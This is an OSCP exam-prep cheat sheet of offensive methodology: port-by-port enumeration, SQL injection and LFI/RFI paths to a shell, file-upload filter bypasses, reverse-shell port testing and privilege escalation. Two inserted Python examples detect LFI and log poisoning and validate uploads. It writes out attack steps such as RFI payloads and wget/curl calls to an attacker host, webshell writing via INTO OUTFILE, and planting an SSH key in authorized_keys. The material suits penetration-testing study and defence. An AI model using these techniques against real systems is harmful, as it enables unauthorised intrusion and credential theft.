OSCP Guide 2021 v2

Service enumeration (by port)

21/FTP
  Anonymous login
    File read: any confidential information may be exposed
    File write: a possible file write that can be reached through the web
      FTP file upload ==> execute from web == webshell
  Password checking: try passwords you found with other services
  enum: maybe brute-force

22/SSH
  Password checking: try passwords you found with other services
  No brute-force 99.99%
  enum

25/SMTP
  Username enumeration, which can be chained to another vulnerability

80|443/HTTP/S
  Gobuster
    DIR: for finding hidden directories and files
    DNS: for finding subdomains
  NIKTO: quick information about the web stuff

139|445/SMB
  Null session: accessing without creds
    Read permission: confidential files may be available
    Write permission: possible file upload to execute through the web service
    Tools
      smbmap: for checking which shares are available, with permission information
      smbclient: for connecting to the SMB server and accessing the shares that are available
  Guest session: accessing with any username
    Read permission: confidential files may be available
    Write permission: possible file upload to execute through the web service
    Tools
      smbmap: for checking which shares are available, with permission information
      smbclient: for connecting to the SMB server and accessing the shares that are available

135/RPC
  Username enumeration
  Network enum
  Tool: rpcclient
    rpcclient -U '%' -N <IP>

2049/NFS
  Open NFS share
    Read access: confidential files may be available
    Write access: possible file upload to execute through the web service
  Tools
    showmount: for finding the shares available
    mount: for mounting a share that is available

3306/MYSQL
  Try login without a password
  If not (unauthorized): can be used for checking passwords found via a different service
  Tools: mysql (client)

5985|5986/WINRM/S
  Remote Windows machine access
  Evil-WinRM (tool)
    With password
    With hash

3389/RDP
  Try login with the creds you have
  Use different clients like remmina if you see any errors with another client
  If logged in, share a folder to transfer files through remmina

161/SNMP
  Access critical information about the target system
  Tools
    snmp-check
    snmpwalk

53/DNS
  Can be used for getting information about subdomains

TO SHELL

SQL injection
  By reading files
    Function: LOAD_FILE('<FILE LOCATION>')
    SSH private keys: to get information about users, read /etc/passwd
    Use the PayloadAllTheThings LFI list for finding other critical information
  By writing files
    Function
      INTO DUMPFILE '<FILE LOCATION>': binary mode
      INTO OUTFILE '<FILE LOCATION>': ASCII mode
    Webshell writing in the web-hosting directory
      To find the web-hosting directory use the LFI list
      FILE permission
    For Windows use \\<Attacker IP>\sharename\anyfilename to get the hash of the user (Responder tool)
  Webshells which can be used
    Windows: Oneliner (priority), P0wnyShell, b374k
    Linux: Oneliner (priority), P0wnyShell, b374k
  Manual approaches
    To get information about databases and tables
    Find username/password & try the same with other services like ssh, winrm, etc.
    Read names carefully

Privilege Escalation

Windows
  Manual approaches
    1) Check the low-privilege shell's permissions (whoami /priv) and try exploiting vuln X
    2) Check the software installation directories and find suspicious programs that are installed
    3) Check for weak permissions in services and their binpath
    4) Check for the unquoted service path vulnerability
    5) Check whether the service registry permissions vulnerability exists
    6) Check scheduled tasks
  Automated (best for beginners)
    PowerUp: fails to check vulnerable software
    WinPEAS: it's like using a sword for sewing ......
    Check Windows Exploit Suggester: sometimes the creator forgot to use the latest OS, and this can be a lucky time for you and you might find something.

Linux
  Manual approaches
    Check for sudoers misconfigurations
    Check for SUID permissions
    Check services running as root
    Check internal ports: keep eyes on 127.0.0.1
    Check ports blocked by firewall: compare with the nmap result you have
    Check the kernel version and its exploits
  Automated (best for beginners)
    LSE (best)
    linPEAS: it is allowed for enumeration but not for exploitation, and in recent changes linpeas has implemented exploitation too, which is not allowed. So simply find the vuln and exploit it manually (not just by executing linpeas).
    LinEnum

Port which can be used for getting a LAN shell
  Ping test
    Attacker: tcpdump -i <tun0> -n icmp
    Target (Windows): ping -n 1 <Attacker IP>
    Target (Linux): ping -c 1 <Attacker IP>
  HTTP test
    Attacker: python3 -m http.server <PORT to test>
    Target (Windows): powershell wget http://<Attacker IP>:<PORT>/test
    Target (Linux): wget http://<Attacker IP>:<PORT>/test  or  curl http://<Attacker IP>:<PORT>/test
    If a connection to the port is received, use that port for getting the reverse shell
  Common ports which work all the time
    Windows: 21,22,25,80,443,445,53,123 (priority 445)
    Linux: 21,22,25,80,443,445,53,123 (priority 22)

Unix command injection
  Web-shell method
    Use the wget command to write a web-shell to the web-hosting directory
    Using the curl command, write a web-shell in the web-hosting directory
    mkpsrevshell
  Windows
    PowerShell Nishang shell
    Path sometimes changed
    nc.exe upload
    Using an alternative command (SHELLCODE)

OSCP Guide 2021 V2
Telegram: https://t.me/R0B077
LinkedIn: linkedin.com/in/rikunj/
Changelogs
  1) added ref links on each topic
  2) minor changes
  3) added a couple more vulns and enum

LAN-shell method
  After checking that ping is working and the port connection is verified (IMP)
    nc
    Google "Linux reverse shell cheatsheet": python, ruby, bash, many more

Exploitation
  Automated exploits
    Sometimes exploits contain proxies
    Turning dev exploits into final configurations
    Solving errors
    Modifications
    Find an automated one
    Read and understand it completely
  Instruction-based exploits
    Use logic, as most of the time instruction-based exploits require you to fully understand the concepts
    They need fewer modifications, but they require things like changing a path or maybe finding a path
  Finding alternatives
    Search on Google with the CVE number and find blogs, exploits from GitHub, papers, etc.
    searchsploit will help to quickly list all of those
    Try all exploits if no version information is disclosed, as sometimes it's obfuscated
  Exploiting the right way
    Focus more on critical vulnerabilities
    Practice more on vanilla BoF AKA stack-based BoF (BufferOverflow)

Vulnerabilities specific

LFI
  TO SHELL
    SSH method
      Upload the attacker's public key to /home/<USER>/.ssh/authorized_keys; if the folder does not exist, create it ;)
      Only works if the user is not a daemon (a service user like apache or www-data)
    Log poisoning
      Try to access the logs of the different services running, i.e. ftp, smb, http
      If any of the log files is accessible, check whether your input is reflected
      To get the log file locations use the LFI list
    Session poisoning
      Try accessing the session file
      To get the session file location: <?php echo session_save_path(); ?> (on any Linux machine)
      Read your cookie value and modify the file name with it
      Add your session id (IMP)
  Reading confidential files
    SSH private key: for getting the user's home location read /etc/passwd
    Config files: use the PayloadAllTheThings LFI list
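The LFI, log-poisoning and session-poisoning techniques above all leave traces in the web server's own access log: the traversal or sensitive-file path in the request, and PHP tags in a field the server writes to disk (request line, Referer, User-Agent). The following Python script is an added example, not part of the guide, showing how a defender can flag both from Apache combined-format log lines. The log lines are constructed sample data, and the pattern lists and function names are my own choices.

```python
"""Detect LFI, log-poisoning and session-poisoning attempts in Apache access logs.

Added example (not part of the guide). Parses Apache "combined" log lines and
flags (a) traversal / sensitive-file requests, i.e. the LFI itself, and (b) PHP
code in attacker-controlled fields, which is what log and session poisoning rely
on. All log lines below are constructed sample data.
"""
import re
from urllib.parse import unquote

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Indicators of the LFI itself: traversal plus the files the guide says get read.
LFI_PATTERNS = [
    r"\.\./", r"\.\.\\", r"/etc/passwd", r"/etc/shadow", r"\.ssh/id_rsa",
    r"/var/log/", r"/proc/self/", r"sess_[0-9a-z]{5,}", r"php://",
    r"session_save_path",
]
LFI_RE = re.compile("|".join(LFI_PATTERNS), re.IGNORECASE)
# PHP code in a field the server writes to a log or session file = poisoning attempt.
PHP_TAG_RE = re.compile(r"<\?(php|=)|\b(system|passthru|shell_exec)\s*\(", re.IGNORECASE)


def parse_line(line: str):
    """Return the named fields of a combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry: dict) -> list:
    """Return finding labels for one parsed entry (empty list = clean)."""
    findings = []
    # URL-decode first so %2e%2e%2f and ../ are treated alike.
    if LFI_RE.search(unquote(entry["request"])):
        findings.append("lfi-attempt")
    for field_name in ("request", "referer", "agent"):
        if PHP_TAG_RE.search(unquote(entry[field_name])):
            findings.append(f"php-in-{field_name}")
    return findings


def scan(lines) -> list:
    """Scan log lines; return (ip, request, findings) for every suspicious line."""
    results = []
    for line in lines:
        entry = parse_line(line)
        if not entry:
            continue  # not combined format; skip rather than guess
        found = classify(entry)
        if found:
            results.append((entry["ip"], entry["request"], found))
    return results


# Constructed sample log lines (not from any real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2021:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2021:13:56:01 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1842 "-" "curl/7.74.0"',
    '10.0.0.9 - - [10/Oct/2021:13:56:10 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"',
    '10.0.0.9 - - [10/Oct/2021:13:56:30 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fvar%2flog%2fapache2%2faccess.log&cmd=id HTTP/1.1" 200 9001 "-" "curl/7.74.0"',
    '10.0.0.9 - - [10/Oct/2021:13:57:02 +0000] "GET /index.php?page=/var/lib/php/sessions/sess_abc123def HTTP/1.1" 200 300 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for ip, req, found in scan(SAMPLE_LOG):
        print(f"{ip}  {', '.join(found)}  {req}")
```

The third sample line shows why the User-Agent is the field to watch: the server writes it verbatim into access.log, so a PHP tag there is the poisoning step itself, and the fourth line is the include of that log that would execute it.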
RFI
  Port which can be used for getting a LAN shell
    Start with
      Attacker: python3 -m http.server <PORT to test>
      Target (Windows): change the RFI param value to http://<Attacker_IP>:<PORT>/test
      Target (Linux): change the RFI param value to http://<Attacker_IP>:<PORT>/test
    Common ports which work all the time
      Windows: 21,22,25,80,443,445,53,123 (priority 445)
      Linux: 21,22,25,80,443,445,53,123 (priority 22)
  Shells
    Windows: Google "windows php reverse shell" and use that; oneliner is best
    Linux: Google "Linux php reverse shell" and use that; oneliner is best
  Once the port to use is found
    The payload should be: http://<Attacker_IP>:<PORT>/shell.php&cmd=whoami
    The payload should not be: http://<Attacker_IP>:<PORT>/shell.php?cmd=whoami
  TIPS: ? and & make a huge difference

Web-Enum

Uploading file
  php (Windows IIS & Apache httpd)
    Shells
      oneliner
      p0wny
      b374k
      msfvenom
    Bypasses
      Magic bytes bypass: modify the first few bytes (the signature) with a PNG signature
      File extension bypass AKA double extensions: use a double extension as below
        php.png
        php.jpeg
        php.gif
      Similar extensions: php/php4/php5/phtml
      File size check (client check only)
        If the data sends a file size param, modify the value to something higher
        Use a oneliner or smaller shells
      Content type check: intercept the request through Burp, check the Content-Type header and modify it as below
        image/png
        image/jpeg
        image/gif
        text/plain
  asp/aspx (Windows IIS server)
    Shells
      Google "ASPX shell", use those webshells and follow the web-shell to LAN-shell method as shown earlier
      Create an ASP/ASPX reverse shell with msfvenom
    Bypasses
      Content type check: intercept the request through Burp, check the Content-Type header and modify it as below
        image/png
        image/jpeg
        image/gif
        text/plain
      File size check (client check only)
        If the data sends a file size param, modify the value to something higher
        Use a oneliner or smaller shells
  jsp (for Apache Tomcat)
    Shells
      Google "jsp shell", use those webshells and follow the web-shell to LAN-shell method as shown earlier
      Create a JSP shell with msfvenom and use that
    Bypasses

Accessing the file
  gobuster: do a dictionary-based attack to find all the hidden directories
    gobuster dir -w <wordlist> -u http://<IP>:<PORT>/ -t 100
  ffuf: do fuzzing with a dictionary-based attack
    ffuf -w <wordlist> -u http://<IP>:<PORT>/FUZZ/filename_you_uploaded.php -t 100 -mc 200
  Best directory wordlists
    wordlist: dirbuster directory-list-2.3 big or medium
    seclists: directory-list-2.3-big.txt, raft wordlists
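Every bypass in the upload list above works because the check it defeats runs on the wrong side or on the wrong data: the Content-Type header and the size parameter are client-supplied, a double extension fools a check that looks only at the last or the first extension, and a magic-byte check accepts anything that starts with a PNG signature. The Python validator below is an added example, not from the guide, showing the server-side checks that close each one; `validate_upload`, `Verdict` and the sample files are my own constructions.

```python
"""Server-side upload validation that closes the bypasses listed in the guide.

Added example (not from the guide). Each check corresponds to one bypass:
the client's Content-Type and size fields are ignored, the extension is taken
from the whole filename (so shell.php.png and shell.phtml are refused), the
magic bytes must match the allowed type, and a script tag inside "image" data
is refused as defence in depth. Sample uploads are constructed.
"""
import os
import secrets
from dataclasses import dataclass

# Allowed types: extension -> expected magic bytes. The client-sent
# Content-Type header is deliberately never consulted.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024  # enforced on bytes actually received, not a form field


@dataclass
class Verdict:
    accepted: bool
    reason: str
    stored_name: str = ""


def split_extension(filename: str):
    """Return (name, ext) for a plain 'name.ext' filename, else (None, None)."""
    base = os.path.basename(filename.replace("\\", "/"))
    # Double extensions such as shell.php.png carry a dot in the base part;
    # dot-files such as .htaccess are refused too.
    if base.count(".") != 1 or base.startswith("."):
        return None, None
    name, ext = base.rsplit(".", 1)
    return name, ext.lower()


def magic_matches(ext: str, data: bytes) -> bool:
    return data.startswith(ALLOWED[ext])


def validate_upload(filename: str, data: bytes, client_content_type: str = "") -> Verdict:
    """Decide whether an uploaded file may be stored.

    client_content_type is accepted only to make the point that it plays no
    part in the decision.
    """
    if len(data) > MAX_BYTES:
        return Verdict(False, "file too large (server-side size check)")
    _name, ext = split_extension(filename)
    if ext is None:
        return Verdict(False, "rejected filename: double extension, dot-file or no extension")
    if ext not in ALLOWED:  # php, php4, php5, phtml, asp, aspx, jsp ... all land here
        return Verdict(False, f"extension .{ext} not in allowlist")
    if not magic_matches(ext, data):
        return Verdict(False, "content does not match the declared image type")
    # Defence in depth: a PNG signature glued onto PHP source still carries the
    # tag. Re-encoding the image with an imaging library is the stronger control.
    if b"<?" in data or b"<%" in data:
        return Verdict(False, "script tag found inside image data")
    # Store under a random, server-chosen name; the user's name never reaches disk.
    return Verdict(True, "accepted", f"{secrets.token_hex(16)}.{ext}")


# Constructed sample uploads, one per bypass from the guide's list.
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLES = {
    "photo.png": (PNG_HEADER, "image/png"),                      # legitimate
    "shell.php": (b"<?php echo 1; ?>", "image/png"),             # Content-Type lie
    "shell.php.png": (PNG_HEADER, "image/png"),                  # double extension
    "shell.phtml": (PNG_HEADER, "image/png"),                    # similar extension
    "pic.png": (b"<?php echo 1; ?>", "image/png"),               # wrong magic bytes
    "pic2.png": (PNG_HEADER + b"<?php echo 1; ?>", "image/png"), # magic bytes prepended
}

if __name__ == "__main__":
    for fname, (data, ctype) in SAMPLES.items():
        v = validate_upload(fname, data, ctype)
        print(f"{fname:16} {'ACCEPT' if v.accepted else 'REJECT'}  {v.reason}")
```

The random stored name matters for the "Accessing the file" step as well: if the server never uses the uploaded filename on disk and serves the upload directory without script execution, finding the directory with gobuster or ffuf does not give the uploader a runnable shell.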

Finding
  Source code
  Login page
  Comments

CMS
  Don't use any exploit related to XSS/XSRF and so on; focus on the vulnerabilities I mentioned above
  Validating
    Try finding GitHub exploits, as those are better sometimes
    Don't trust versions every time; validate first
  Exploiting
    Follow the earlier topics' checks and validation
    Use the right port to get a LAN shell
  Wordpress: WPScan (read the manual)
  Other
    Custom exploits take place here; you might have to find the vulnerability on your own from the list above
    X-Forwarded-For for accessing a 403 page